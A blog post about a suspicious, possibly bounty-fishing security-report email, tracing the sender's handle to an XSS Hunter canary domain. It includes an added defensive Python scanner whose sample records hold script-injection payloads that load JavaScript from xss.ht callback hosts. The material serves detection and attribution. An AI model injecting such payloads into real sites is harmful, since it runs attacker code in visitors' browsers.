(new Soapbox())->shout(array_map('strtoupper', $opinions)); //Shaun's blog



Jay Niffley, Man of Mystery

Posted November 04, 2019 by shaun

Yesterday I received a brief message to an email address listed in various security.txt files:

Date: Sun, 3 Nov 2019 21:36:01 +0100
From: Jay Niffley <jayniffley [] gmail.com>
Subject: Security issues

Hello,

I've found some security issues in your website. Where can I report these
issues? Do you reward for valid security issues?

Thank you!
-Jay

A Google search for the name "Jay Niffley" was unproductive, and it's likely that no real person by that name exists. But the "jayniffley" handle has been used at least once before, in what appears to be an attempted XSS probe on a cryptocurrency wallet manufacturer's support forum. The forum post containing the failed XSS attack references the hostname jayniffley.xss.ht. That hostname belongs to a user of XSS Hunter, a hosted blind-XSS service: each user gets a subdomain of xss.ht to embed in injected payloads, and the service notifies them when a payload executes in someone's browser, which makes it a canary for automated XSS testing. The subdomain is the user's handle, so it doubles as an attribution clue. Visiting the host in a browser serves up a large JavaScript file ([archive]).
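The xss.ht subdomain is the kind of indicator a site operator can hunt for in their own submitted content. The following is an added example, not code from this post: a small Python scanner that decodes form-field text and extracts any XSS Hunter callback host it references, returning the handle so the probe can be tied back to an actor. It assumes submissions (or access-log query strings) are available as text records; the sample records, including the shape of the payload attributed to "jayniffley", are constructed for illustration.

```python
"""Flag submitted content that embeds a blind-XSS callback host.

Added example, not code from the original post. Assumptions: each form
submission (or logged query string) is available as one text record, and
the callback domain of interest is xss.ht (the XSS Hunter service named in
the post). Operators can extend CANARY_DOMAINS for other services.
"""
from __future__ import annotations

import html
import re
from urllib.parse import unquote

# Domains whose subdomains identify a blind-XSS user. Only xss.ht is taken
# from the post; anything added here is the operator's own assumption.
CANARY_DOMAINS = ("xss.ht",)

# Matches "//<handle>.<canary-domain>" with or without an http(s): scheme.
# A bare reference to the apex (e.g. "https://xss.ht") is not a callback.
HOST_RE = re.compile(
    r"(?:https?:)?//([a-z0-9-]+)\.("
    + "|".join(re.escape(d) for d in CANARY_DOMAINS)
    + r")\b",
    re.IGNORECASE,
)


def normalize(text: str, rounds: int = 3) -> str:
    """Unwind nested percent-encoding and HTML entities before matching."""
    decoded = text
    for _ in range(rounds):
        step = html.unescape(unquote(decoded))
        if step == decoded:
            break
        decoded = step
    return decoded


def extract_canary_hosts(text: str) -> list[tuple[str, str]]:
    """Return (handle, domain) pairs for every callback host in the text."""
    return [
        (m.group(1).lower(), m.group(2).lower())
        for m in HOST_RE.finditer(normalize(text))
    ]


def scan(records: list[str]) -> list[dict]:
    """Scan each record and report which ones carry a callback host."""
    hits = []
    for idx, rec in enumerate(records):
        for handle, domain in extract_canary_hosts(rec):
            hits.append({"record": idx, "handle": handle, "domain": domain})
    return hits


# Constructed sample submissions (not real traffic). Record 0 is a guess at
# the payload shape behind the forum post described above, URL-encoded as a
# form body would be; record 3 mentions the apex domain without a handle.
SAMPLE_RECORDS = [
    "name=Jay&body=%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fjayniffley.xss.ht"
    "%3E%3C%2Fscript%3E",
    "name=alice&body=Hello, is there a bounty program?",
    'name=bob&body=<script src="//someuser.xss.ht"></script>',
    "name=carol&body=see https://xss.ht for the tool",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_RECORDS):
        print(f"record {hit['record']}: blind-XSS callback to "
              f"{hit['handle']}.{hit['domain']}")
```

Running it reports records 0 and 2 and leaves the apex-only mention alone; the decoded handle is what you would compare against the sender of any "I've found some security issues" e-mail.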

Not knowing whether this vague inquiry was legitimate, I replied with the appropriate contact information and the disappointing news that no bounties are available. Then I took to Twitter to ask whether others had received the same message. Several people confirmed getting a copy at their own security.txt contact addresses. One analyst who replied with a bounty offer was sent some low-severity bugs, but the conversation quickly soured, with "Niffley" expressing displeasure at the proposed resolution timeline.

It's unclear whether this is an earnest actor attempting to report valid problems, or someone who's running a series of automated scans and carpet-bombing security contacts hoping to scare up some reward money. After declining to pay a bounty, I never heard back from him. If you have insight, feel free to reply to the tweet.


